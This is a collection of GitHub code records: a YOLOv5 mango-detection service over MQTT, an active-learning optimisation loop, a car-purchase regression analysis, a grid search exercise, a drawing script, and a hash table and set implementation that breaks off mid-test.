{"seq_id":"23493785974","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport os\nimport platform\nimport shutil\nimport time\nfrom pathlib import Path\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom numpy import random\nfrom models.experimental import attempt_load\nfrom utils.datasets import LoadStreams, LoadImages\nfrom utils.general import (\n    check_img_size, non_max_suppression, apply_classifier, scale_coords,\n    xyxy2xywh, plot_one_box, strip_optimizer, set_logging)\nfrom utils.torch_utils import select_device, load_classifier, 
time_synchronized\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\nimport tensorflow as tf\nimport numpy as np\nfrom efficientnet import tfkeras as efn \nfrom array import array\nimport paho.mqtt.client as mqtt\nimport configparser\nimport datetime\nimport threading\nimport base64,io\nimport ast, re\nimport PIL.Image as Image\nimport paho.mqtt.publish as publish\n\n\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\nos.chdir('/home/pi/yolov5')\n\n\ndef letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):\n # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232\n shape = img.shape[:2] # current shape [height, width]\n if isinstance(new_shape, int):\n new_shape = (new_shape, new_shape)\n\n # Scale ratio (new / old)\n r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])\n if not scaleup: # only scale down, do not scale up (for better test mAP)\n r = min(r, 1.0)\n\n # Compute padding\n ratio = r, r # width, height ratios\n new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))\n dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding\n if auto: # minimum rectangle\n dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding\n elif scaleFill: # stretch\n dw, dh = 0.0, 0.0\n new_unpad = (new_shape[1], new_shape[0])\n ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios\n\n dw /= 2 # divide padding into 2 sides\n dh /= 2\n\n if shape[::-1] != new_unpad: # resize\n img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border\n return img, ratio, (dw, dh)\n\ndef makeDict(Message):\n pattern = \"({.*})\"\n Message_String = str(Message)\n Message_Dict = ast.literal_eval(re.findall(pattern,Message_String)[0])\n return Message_Dict\n\ndef tobase64(img):\n return base64.b64encode(img).decode('ascii')\n\ndef readimage(path):\n count = os.stat(path).st_size / 2\n with open(path, \"rb\") as f:\n return f.read()\n\ndef imgArraytobase64(imgArray):\n pil_im = Image.fromarray(imgArray)\n b = io.BytesIO()\n pil_im.save(b, 'jpeg')\n im_bytes = b.getvalue()\n b64Img = tobase64(im_bytes)\n return b64Img\n\ndef on_connect(client, userdata, flags, rc):\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\" Connected with result code \"+str(rc))\n client.subscribe(ToMQTTTopicSUB)\n \ndef on_disconnect(client, userdata, rc):\n client.reconnect()\n client.subscribe(ToMQTTTopicSUB)\n\ndef on_message(client, userdata, msg):\n print(\"message Received\")\n\n data_dict = makeDict(msg.payload)\n\n print(\"Image Received\")\n try:\n dec = data_dict['device']\n rep = data_dict['reply']\n nparr = np.frombuffer(base64.b64decode(data_dict['img']), np.uint8)\n img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR) # cv2.IMREAD_COLOR in OpenCV 3.1\n global abcmodel,efn_model,badmodel\n threading.Thread(target=dect_pic,args = (abcmodel,efn_model,badmodel,img_np,dec,rep,640)).start()\n except Exception as e:\n# pub_topic = {\"pi\":config['Mqtt']['pi'],\"line\":config['Mqtt']['line'],\"arm\":config['Mqtt']['arm']}\n publish.single(\"fromai/\", str({\"result\":\"ERROR!\",\"errorcode\":e}), hostname=ToMQTTTopicServerIP,port=ToMQTTTopicServerPort) #傳輸MQTT訊息 單次傳輸方便用\n\n\n\n\ndef letterbox(img, new_shape=(640, 640), color=(114, 114, 
114), auto=True, scaleFill=False, scaleup=True):\n # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232\n shape = img.shape[:2] # current shape [height, width]\n if isinstance(new_shape, int):\n new_shape = (new_shape, new_shape)\n\n # Scale ratio (new / old)\n r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])\n if not scaleup: # only scale down, do not scale up (for better test mAP)\n r = min(r, 1.0)\n\n # Compute padding\n ratio = r, r # width, height ratios\n new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))\n dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding\n if auto: # minimum rectangle\n dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding\n elif scaleFill: # stretch\n dw, dh = 0.0, 0.0\n new_unpad = (new_shape[1], new_shape[0])\n ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios\n\n dw /= 2 # divide padding into 2 sides\n dh /= 2\n\n if shape[::-1] != new_unpad: # resize\n img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border\n return img, ratio, (dw, dh)\n\n\ndef load_Yolo_model(weights = './last.pt'):\n device = select_device('cpu')\n model = attempt_load(weights, map_location=device)\n imgsz = check_img_size(640, s=model.stride.max())\n half = device.type != 'cpu'\n if half:\n model.half()\n # names = model.module.names if hasattr(model, 'module') else model.names\n # colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(names))]\n return model\n\ndef load_CNN_model(weights = './efnB7.hdf5'):\n model = tf.keras.models.load_model(weights)\n return model\n\ndef dect_pic(model,efn_model,badmodel,im0s,dec,reply,imgsz=640):\n write_bbox_to_img = True\n\n device = select_device('cpu')\n half = device.type != 'cpu'\n names = model.module.names if hasattr(model, 'module') else model.names\n colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(names))]\n # out = './output'\n# im0s = cv2.imread(img_path)\n img = letterbox(im0s, new_shape=imgsz)[0]\n # Convert\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n img = np.ascontiguousarray(img)\n\n # for path, img, im0s, vid_cap in dataset:\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n pred = model(img, augment='')[0]\n\n # Apply NMS .4:conf .5:iou\n pred = non_max_suppression(pred, 0.4, 0.5, classes='', agnostic='')\n # print(pred)\n\n # Process detections\n detect_list = []\n result_list = []\n for i, det in enumerate(pred): # detections per image\n s, im0 = '', im0s\n \n if det is not None and len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n c1, c2 = (int(xyxy[0]), int(xyxy[1])), (int(xyxy[2]), int(xyxy[3]))\n de = []\n for i in xyxy:\n print(i/10)\n de.append(int(i/10))\n\n if(detect_list == []):\n crop_img = im0[c1[1]:c2[1], c1[0]:c2[0]] #crop_img's ndarray\n im = Image.fromarray(crop_img).resize((600,600)) #read from array and resize resize((size,size)) size:efn_model's \n test = np.array(im).reshape(1,600,600,3)/255\n pre = 
efn_model.predict(test)\n\n pred=np.argmax(pre,axis=1)[0]\n use_badmango_yolo = True\n if use_badmango_yolo:\n # print(crop_img.shape)\n im = Image.fromarray(crop_img).resize((1280,720))\n bad_im0 = dect_badpic(badmodel,np.array(im),640)\n print(bad_im0.shape)\n new_im = Image.fromarray(bad_im0).resize((crop_img.shape[1],crop_img.shape[0]))\n im0[c1[1]:c2[1], c1[0]:c2[0]] = new_im\n if write_bbox_to_img: # Add bbox to image\n result_list.append(names[int(pred)])\n label = '%s %.2f' % (names[int(pred)], pre[0][int(pred)]) #e.g A 0.59\n yoloLab = '%s %.2f' % (names[int(cls)], conf) #e.g A 0.50\n print(\"CNN\",label)\n print(\"yolo\",yoloLab)\n plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=3)\n # cv2.imwrite('./crop_dect.jpg', crop_img)\n else:\n for i in detect_list:\n if(i == de):\n continue\n else:\n crop_img = im0[c1[1]:c2[1], c1[0]:c2[0]] #crop_img's ndarray\n im = Image.fromarray(crop_img).resize((600,600)) #read from array and resize resize((size,size)) size:efn_model's \n test = np.array(im).reshape(1,600,600,3)/255\n pre = efn_model.predict(test)\n\n pred=np.argmax(pre,axis=1)[0]\n use_badmango_yolo = True\n if use_badmango_yolo:\n # print(crop_img.shape)\n im = Image.fromarray(crop_img).resize((1280,720))\n bad_im0 = dect_badpic(badmodel,np.array(im),640)\n print(bad_im0.shape)\n new_im = Image.fromarray(bad_im0).resize((crop_img.shape[1],crop_img.shape[0]))\n im0[c1[1]:c2[1], c1[0]:c2[0]] = new_im\n if write_bbox_to_img: # Add bbox to image\n result_list.append(names[int(pred)])\n label = '%s %.2f' % (names[int(pred)], pre[0][int(pred)]) #e.g A 0.59\n yoloLab = '%s %.2f' % (names[int(cls)], conf) #e.g A 0.50\n print(\"CNN\",label)\n print(\"yolo\",yoloLab)\n plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=3)\n\n b64Img = imgArraytobase64(im0[:,:,::-1]) #convert imgarray to btye then to base64\n cv2.imwrite('./test_dect22.jpg', im0)\n data_dict = {\"result\":result_list,\"img\": b64Img,\"reply\":reply,\"device\":dec}\n config = configparser.ConfigParser()\n config.read(\"./config.ini\")\n ToMQTTTopicServerIP = config['Mqtt']['MQTTTopicServerIP']\n ToMQTTTopicServerPort = int(config['Mqtt']['port'])\n pub_topic = {\"pi\":config['Mqtt']['pi'],\"line\":config['Mqtt']['line'],\"arm\":config['Mqtt']['arm']}\n publish.single(pub_topic[dec], str(data_dict), hostname=ToMQTTTopicServerIP,port=ToMQTTTopicServerPort) #傳輸MQTT訊息 單次傳輸方便用\n \n\ndef dect_badpic(model,im0s,imgsz=640):\n write_bbox_to_img = True\n device = select_device('cpu')\n half = device.type != 'cpu'\n names = model.module.names if hasattr(model, 'module') else model.names\n colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(names))]\n # out = './output'\n# print(np.array(im0s)[:,:,::-1])\n# print(im0s.shape)\n# im0s = cv2.imread('./badmango.jpg')\n# print(im0s)\n# print(im0s.shape)\n img = letterbox(im0s, new_shape=imgsz)[0]\n # Convert\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n img = np.ascontiguousarray(img)\n\n # for path, img, im0s, vid_cap in dataset:\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n pred = model(img, augment='')[0]\n\n # Apply NMS .4:conf .5:iou\n pred = non_max_suppression(pred, 0.4, 0.5, classes='', agnostic='')\n # print(pred)\n\n # Process detections\n for i, det in enumerate(pred): # detections per image\n s, im0 = '', im0s\n if det 
is not None and len(det):\n            # Rescale boxes from img_size to im0 size\n            det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()\n\n            # Write results\n            for *xyxy, conf, cls in reversed(det):\n                c1, c2 = (int(xyxy[0]), int(xyxy[1])), (int(xyxy[2]), int(xyxy[3]))\n                if write_bbox_to_img:  # Add bbox to image\n                    yoloLab = '%s %.2f' % (names[int(cls)], conf) #e.g A 0.50\n                    print(\"yolo\",yoloLab)\n                    plot_one_box(xyxy, im0, label=yoloLab, color=colors[int(cls)], line_thickness=3)\n    return im0\n\n\n# read the configuration file\nconfig = configparser.ConfigParser()\nconfig.read(\"./config.ini\")\n_g_cst_ToMQTTTopicServerIP = config['Mqtt']['MQTTTopicServerIP']\n_g_cst_ToMQTTTopicServerPort = int(config['Mqtt']['port'])\n_yolo_mango_weight_path = config['Weights']['yolo_abc']\n_yolo_badMango_weight_path = config['Weights']['yolo_bad']\n_CNN_weight_path = config['Weights']['cnn']\nToMQTTTopicSUB = config['Mqtt']['sub']\n# preload the models\nabcmodel = load_Yolo_model(_yolo_mango_weight_path) \nbadmodel = load_Yolo_model(_yolo_badMango_weight_path)\nefn_model = load_CNN_model(_CNN_weight_path)\n\n# establish the MQTT connection\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_disconnect = on_disconnect\nclient.connect(_g_cst_ToMQTTTopicServerIP, _g_cst_ToMQTTTopicServerPort,60)\nclient.loop_forever()\n\n","repo_name":"JackHsuan/Yolov5_selftutorial","sub_path":"detect_withMqtt.py","file_name":"detect_withMqtt.py","file_ext":"py","file_size_in_byte":14303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"13363819025","text":"from activestructopt.optimization.rmc.rmc import rmc_ucb\nfrom activestructopt.gnn.ensemble import Ensemble\nfrom activestructopt.dataset.dataset import make_data_splits, update_datasets\nimport numpy as np\n\ndef active_learning(\n  optfunc, \n  args, \n  target,\n  config, \n  initial_structure, \n  max_forward_calls = 100,\n  rmc_iterations = 10000,\n  N = 30, \n  k = 5, \n  perturbrmin = 0.0, \n  perturbrmax = 1.0, \n  split = 1/3, \n  device = 'cuda',\n  rmcσ = 0.0025,\n  σr = 0.1,\n  λ = 1.0,\n  print_mses = True,\n  ):\n  structures, ys, datasets, kfolds, test_indices, test_data, test_targets = make_data_splits(\n    initial_structure,\n    optfunc,\n    args,\n    config['dataset'],\n    N = N,\n    k = k,\n    perturbrmin = perturbrmin,\n    perturbrmax = perturbrmax,\n    split = split,\n    device = device,\n  )\n  mses = [np.mean((y - target) ** 2) for y in ys]\n  if print_mses:\n    print(mses)\n  for i in range(max_forward_calls - N):\n    starting_structure = structures[np.argmin(mses)].copy()\n    ensemble = Ensemble(k, config, datasets)\n    ensemble.train()\n    ensemble.set_scalar_calibration(test_data, test_targets)\n    new_structure = rmc_ucb(\n      ensemble.predict,\n      {},\n      target,\n      rmcσ,\n      starting_structure,\n      rmc_iterations,\n      σr = σr,\n      λ = λ,\n    )\n    structures.append(new_structure)\n    datasets, y = update_datasets(\n      datasets,\n      new_structure,\n      config['dataset'],\n      optfunc,\n      args,\n      device,\n    )\n    ys.append(y)\n    new_mse = np.mean((y - target) ** 2)\n    mses.append(new_mse)\n    if print_mses:\n      print(new_mse)\n  return structures, ys, mses, (\n    datasets, kfolds, test_indices, test_data, test_targets, ensemble)\n","repo_name":"Fung-Lab/ActiveStructOpt","sub_path":"activestructopt/active/active.py","file_name":"active.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"73926912145","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as 
np\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import accuracy_score, mean_squared_error\r\nimport re\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n\r\ndata=pd.read_csv(\"car_purchasing1.csv\")\r\n\r\n \r\ndef preprocessing(data):\r\n data['age'].fillna(data['age'].mean(), inplace=True)\r\n data['annual Salary'].fillna(data['annual Salary'].mean(),inplace=True)\r\n data['credit card debt'].fillna(data['credit card debt'].mean(),inplace=True)\r\n data['net worth'].fillna(data['net worth'].mean(),inplace=True)\r\n data['car purchase amount'].fillna(data['car purchase amount'].mean(),inplace=True)\r\n\r\ndef gender_bar(data):\r\n gender_counts = data['gender'].value_counts()\r\n gender_counts.plot(kind='bar', rot=0, color=['skyblue', 'lightcoral'])\r\n plt.title('Gender Distribution')\r\n plt.xlabel('Gender')\r\n plt.ylabel('Count')\r\n plt.show()\r\n\r\ndef age_hist(data):\r\n data['age'].plot(kind='hist', bins=20, color='orange', edgecolor='black')\r\n plt.title('Age Distribution')\r\n plt.xlabel('Age')\r\n plt.ylabel('Frequency')\r\n plt.show()\r\n\r\ndef scatter_income(data):\r\n plt.scatter(data['annual Salary'], data['net worth'], color='green')\r\n plt.title('Net Worth vs. Annual Salary')\r\n plt.xlabel('Annual Salary')\r\n plt.ylabel('Net Worth')\r\n plt.show()\r\n\r\ndef car_by_country(data):\r\n plt.figure(figsize=(12, 6))\r\n sns.boxplot(x='country', y='car purchase amount', data=data, palette='viridis')\r\n plt.title('Car Purchase Amount by Country')\r\n plt.xlabel('Country')\r\n plt.ylabel('Car Purchase Amount')\r\n plt.xticks(rotation=45)\r\n plt.show()\r\n\r\ndef gender_pie(data):\r\n lable={0:\"Female\",1:\"Male\"}\r\n gender_proportion = data['gender'].map(lable).value_counts()\r\n plt.pie(gender_proportion, labels=gender_proportion.index, autopct='%1.1f%%', colors=['skyblue','lightcoral'])\r\n plt.title('Gender Proportion')\r\n plt.show()\r\n\r\ndef extract_code_from_emails(df):\r\n\r\n def extract_code(email):\r\n match = re.search(r'\\.([a-zA-Z]{2,3})$', email)\r\n return match.group(1) if match else None\r\n\r\n # Apply the function to the specified column and create a new column 'country_code'\r\n df['email_code'] = df['customer e-mail'].apply(extract_code)\r\n\r\n return df\r\n\r\ndef add_columns_for_info(data):\r\n data['fiancial_stability_ratio']=data['annual Salary']/(data['credit card debt']+data['net worth'])\r\n data['networth_age_ratio']=data['net worth']/data['age']\r\n\r\n salary_weight = 0.6\r\n debt_weight = 0.2\r\n net_worth_weight = 0.2\r\n\r\n# Calculate Financial Stability Index\r\n data['financial_stability_index'] = (salary_weight * data['annual Salary'] +\r\n debt_weight * data['credit card debt'] -\r\n net_worth_weight * data['net worth'])\r\n scaler = MinMaxScaler()\r\n data[['networth_age_ratio','fiancial_stability_ratio','financial_stability_index']] = scaler.fit_transform(data[['networth_age_ratio', 'fiancial_stability_ratio', 'financial_stability_index']])\r\n\r\ndef scatter_age(data):\r\n plt.scatter(data['age'], data['net worth'], color='blue',s=50,marker=\"X\")\r\n plt.title('Net Worth vs. 
Age')\r\n plt.xlabel('Age')\r\n plt.ylabel('Net Worth')\r\n plt.show()\r\n\r\ndef prepare_data(data):\r\n # One-hot encode categorical variables\r\n data_encoded = pd.get_dummies(data, columns=['country', 'gender'], drop_first=True)\r\n \r\n X = data_encoded[['age', 'annual Salary', 'credit card debt', 'net worth']]\r\n Y = data_encoded['car purchase amount']\r\n return X, Y\r\n\r\ndef train_and_evaluate_model(X, Y):\r\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=2)\r\n \"\"\"Train a linear regression model and evaluate its accuracy on training and testing data.\"\"\"\r\n model = LinearRegression()\r\n model.fit(X_train, Y_train)\r\n\r\n Y_train_predictions = model.predict(X_train)\r\n training_mse = mean_squared_error(Y_train, Y_train_predictions)\r\n print(\"Mean Squared Error on training data:\", training_mse)\r\n\r\n Y_test_predictions = model.predict(X_test)\r\n testing_mse = mean_squared_error(Y_test, Y_test_predictions)\r\n print(\"Mean Squared Error on testing data:\", testing_mse)\r\n\r\n\r\npreprocessing(data)\r\nscatter_age(data)\r\ngender_bar(data)\r\ngender_pie(data)\r\nage_hist(data)\r\nscatter_age(data)\r\nscatter_income(data)\r\ncar_by_country(data)\r\nadd_columns_for_info(data)\r\ndf=extract_code_from_emails(data)\r\nprint(df)\r\nX,Y=prepare_data(data)\r\ntrain_and_evaluate_model(X,Y)","repo_name":"ShlokArora2709/CODSOFT","sub_path":"sales_prediction/sales_pred.py","file_name":"sales_pred.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3610979089","text":"# -----------\n# User Instructions:\n#\n# Modify the function search so that it returns\n# a table of values called expand. This table\n# will keep track of which step each node was\n# expanded.\n#\n# Make sure that the initial cell in the grid\n# you return has the value 0.\n# ----------\nfrom pprint import pprint\n\ngrid = [[0, 1, 1, 1, 1],\n [0, 1, 0, 0, 0],\n [0, 0, 0, 1, 0],\n [1, 1, 1, 1, 0],\n [0, 0, 0, 1, 0]]\ninit = [0, 0]\ngoal = [len(grid) - 1, len(grid[0]) - 1]\ncost = 1\n\ndelta = [[-1, 0], # go up\n [0, -1], # go left\n [1, 0], # go down\n [0, 1]] # go right\n\ndelta_name = ['^', '<', 'v', '>']\n\n\ndef search(grid, init, goal, cost):\n # ----------------------------------------\n # modify code below\n # ----------------------------------------\n expand = [[-1 for _ in range(len(grid[0]))] for _ in range(len(grid))]\n\n index = 0\n searched = {tuple(init): None}\n open = {(0, init[0], init[1]), }\n\n while len(open) > 0:\n cell = min(open, key=lambda x: x[0])\n open.remove(cell)\n g, x, y = cell\n expand[x][y] = index\n index += 1\n\n for (d_x, d_y) in delta:\n x_n = x + d_x\n y_n = y + d_y\n\n if (x_n, y_n) not in searched and 0 <= x_n < len(grid) and 0 <= y_n < len(grid[0]) and grid[x_n][\n y_n] == 0:\n path = (g + cost, x_n, y_n)\n open.add(path)\n searched[(x_n, y_n)] = (x, y)\n\n if x_n == goal[0] and y_n == goal[1]:\n expand[x_n][y_n] = index\n return expand\n\n return expand\n\n\npath = search(grid, init, goal, cost)\n\npprint(path)\n","repo_name":"Marius-Juston/Advanced-Autonomous-Vehicule","sub_path":"Python/search/expansion_grid.py","file_name":"expansion_grid.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4133842458","text":"import httplib2\nimport urlparse\nimport json\nimport socket\n\n\nclass imenError(Exception):\n def __init__(self, 
value, critical=False):\n self.value = value\n self.critical = critical\n\n def __str__(self):\n return str(self.value)\n\n def __repr__(self):\n return self.value\n\n\nclass imenServer(object):\n def __init__(self, server='', port=''):\n self.server = server\n self.baseuri = 'http://%s:%s' % (self.server, port)\n self.baseapi = '/imen/api'\n\n\n def get(self, url):\n method = 'GET'\n body = ''\n\n if url is not None:\n uri = urlparse.urlparse(self.baseuri + self.baseapi + url)\n else:\n raise imenError('get(): url can not be None')\n\n h = httplib2.Http()\n\n try:\n response, content = h.request(uri.geturl(), method, body)\n except socket.error as err:\n raise imenError(err)\n\n if response['status'] == '200':\n return content\n elif response['status'] == '404':\n return None\n\n\n def post(self, url, body):\n method = 'POST'\n header = {'Content-type': 'application/json'}\n\n h = httplib2.Http()\n\n if url is not None:\n uri = urlparse.urlparse(self.baseuri + self.baseapi + url)\n else:\n raise imenError('post(): url can not be None')\n\n try:\n response, content = h.request(uri.geturl(), method, json.dumps(body), header)\n except socket.error as err:\n raise imenError(err)\n\n if response['status'] == '201':\n return content\n\n if response['status'] == '404':\n jsonData = json.loads(content)\n raise imenError(jsonData['message'])\n\n\nclass imenJob(object):\n def __init__(self, server, jobId = None):\n self.id = jobId\n self.server = server\n\n if self.id is not None:\n self.__load()\n else:\n self.thumb_preset = None\n self.input_filename = None\n self.input_path \t= None\n self.basename = None\n self.output_path = None\n self.priority = 9\n self.__status = None\n self.__progress = None\n self.__message = None\n\n def __load(self):\n data = self.server.get('/job/%s' % str(self.id))\n jsonData = json.loads(data)\n self.thumb_preset = jsonData['job']['thumb_preset']\n self.input_filename = jsonData['job']['input_filename']\n self.input_path = jsonData['job']['input_path']\n self.basename = jsonData['job']['basename']\n self.output_path = jsonData['job']['output_path']\n self.priority = jsonData['job']['priority']\n self.__status = jsonData['job']['status']\n self.__progress = jsonData['job']['progress']\n self.__message = jsonData['job']['message']\n\n def status(self):\n if self.id is not None:\n self.__load()\n return self.__status\n\n def message(self):\n if self.id is not None:\n self.__load()\n return self.__message\n\n def progress(self):\n if self.id is not None:\n self.__load()\n return self.__progress\n\n def start(self):\n if self.id is None:\n if self.server is None:\n raise imenError('Server can not be None')\n if self.input_filename is None:\n raise imenError('input_filename can not be None')\n if self.input_path is None:\n raise imenError('input_path can not be None')\n if self.basename is None:\n raise imenError('basename not be None')\n if self.output_path is None:\n raise imenError('output_path can not be None')\n if self.thumb_preset is None:\n raise imenError('thumb preset can not be None')\n job = {'job':\n {\n 'thumb_preset': self.thumb_preset,\n 'input_filename': self.input_filename,\n 'input_path': self.input_path,\n 'basename': self.basename,\n 'output_path': self.output_path,\n 'priority': self.priority\n }\n }\n\n response = self.server.post('/job/', job)\n responseJson = json.loads(response)\n self.id = responseJson['job']['id']\n self.__load()\n return self.id\n else:\n raise imenError('Job have an id: %s. 
Impossible to start a Job with an ID' % str(self.id))","repo_name":"emilianobilli/tarecho","sub_path":"imen_api.py","file_name":"imen_api.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"12590000024","text":"\r\nimport random\r\nfrom draw2d import \\\r\n    start_drawing, draw_line, draw_oval, draw_arc, \\\r\n    draw_rectangle, draw_polygon, draw_text, finish_drawing\r\n\r\n\r\ndef main():\r\n    # Width and height of the scene in pixels\r\n    scene_width = 800\r\n    scene_height = 500 \r\n\r\n    canvas = start_drawing(\"Scene\", scene_width, scene_height)\r\n    \r\n    half_height = round(scene_height / 2)\r\n    min_diam = 200\r\n    max_diam = 600\r\n    for i in range(100):\r\n        x = random.randint(0, scene_width - max_diam)\r\n        y = random.randint(0, half_height)\r\n        diameter = random.randint(min_diam, max_diam)\r\n        draw_oval(canvas, x, y, x + diameter, y + diameter, fill=\"lightgray\")\r\n\r\n\r\ndef draw_sky(canvas):\r\n    draw_rectangle(canvas, 0, 150, 800, 500, outline=\"\", fill=\"skyblue\")\r\n\r\ndef draw_sun(canvas):\r\n    draw_oval(canvas, 350, 400, 450, 500, outline=\"\", fill=\"yellow\")\r\n\r\ndef draw_ground(canvas):\r\n    draw_rectangle(canvas, 0, 0, 800, 150, outline=\"\", fill=\"green\")\r\n\r\nmain()","repo_name":"karennteran/programming-with-functions","sub_path":"prove milestone 3/random_radient.py","file_name":"random_radient.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"14102420249","text":"__author__ = \"Frank Shen\"\n\n\nclass Array(object):\n    def __init__(self, size=32, init=None):\n        self._size = size\n        self._items = [init] * self._size\n\n    def __len__(self):\n        return self._size\n\n    def __getitem__(self, index):\n        return self._items[index]\n\n    def __setitem__(self, index, value):\n        self._items[index] = value\n\n    def clear(self, value=None):\n        for i in range(len(self._items)):\n            self._items[i] = value\n\n    def __iter__(self):\n        for item in self._items:\n            yield item\n\n\nclass Slot(object):\n    def __init__(self, key, value):\n        self.key = key\n        self.value = value\n\n\nclass HashTable(object):\n    UNUSERD = None\n    EMPTY = Slot(None, None)\n\n    def __init__(self):\n        self._table = Array(8, init=HashTable.UNUSERD)\n        self.length = 0\n\n    @property\n    def _load_factor(self):\n        return self.length / float(len(self._table))\n\n    def __len__(self):\n        return self.length\n\n    def _hash(self, key):\n        return abs(hash(key)) % len(self._table)\n\n    def _find_key(self, key):\n        index = self._hash(key)\n        _len = len(self._table)\n        while self._table[index] is not HashTable.UNUSERD:\n            if self._table[index] is HashTable.EMPTY:\n                index = (index * 5 + 1) % _len\n                continue\n            elif self._table[index].key == key:\n                return index\n            else:\n                index = (index * 5 + 1) % _len\n        return None\n\n    def _slot_can_insert(self, index):\n        return (self._table[index] is HashTable.EMPTY or\n                self._table[index] is HashTable.UNUSERD)\n\n    def _find_slot_for_insert(self, key):\n        index = self._hash(key)\n        _len = len(self._table)\n        while not self._slot_can_insert(index):\n            index = (index * 5 + 1) % _len\n        return index\n\n    def __contains__(self, key):\n        index = self._find_key(key)\n        return index is not None\n\n    def add(self, key, value):\n        if key in self:\n            index = self._find_key(key)\n            self._table[index].value = value\n            return False\n        else:\n            index = self._find_slot_for_insert(key)\n            self._table[index] = Slot(key, value)\n            self.length += 1\n            if 
self._load_factor >= 0.8:\n self._rehash()\n return True\n\n def _rehash(self):\n old_table = self._table\n newsize = len(self._table) * 2\n self._table = Array(newsize, init=HashTable.UNUSERD)\n self.length = 0\n\n for slot in old_table:\n if slot is not HashTable.UNUSERD and slot is not HashTable.EMPTY:\n index = self._find_slot_for_insert(slot.key)\n self._table[index] = slot\n self.length += 1\n\n def get(self, key, default=None):\n index = self._find_key(key)\n if index is None:\n return default\n else:\n return self._table[index].value\n\n def remove(self, key):\n index = self._find_key(key)\n if index is None:\n raise KeyError()\n value = self._table[index].value\n self.length -= 1\n self._table[index] = HashTable.EMPTY\n return value\n\n def __iter__(self):\n for slot in self._table:\n if slot not in (HashTable.UNUSERD, HashTable.EMPTY):\n yield slot.key\n\n\nclass SetADT(HashTable):\n\n def add(self, key):\n return super(SetADT, self).add(key, True)\n\n def __and__(self, other_set):\n new_set = SetADT()\n for element_a in self:\n if element_a in other_set:\n new_set.add(element_a)\n return new_set\n\n def __sub__(self, other_set):\n new_set = SetADT()\n for element_a in self:\n if element_a not in other_set:\n new_set.add(element_a)\n return new_set\n\n def __or__(self, other_set):\n new_set = SetADT()\n for element_a in self:\n new_set.add(element_a)\n for element_b in other_set:\n new_set.add(element_b)\n return new_set\n\n def __xor__(self, other_set):\n new_set = SetADT()\n for element_a in self:\n if element_a not in other_set:\n new_set.add(element_a)\n\n for element_b in other_set:\n if element_b not in self:\n new_set.add(element_b)\n return new_set\n\n\ndef test_set_adt():\n s = SetADT()\n s.add(1)\n s.add(2)\n s.add(3)\n s.add(1)\n 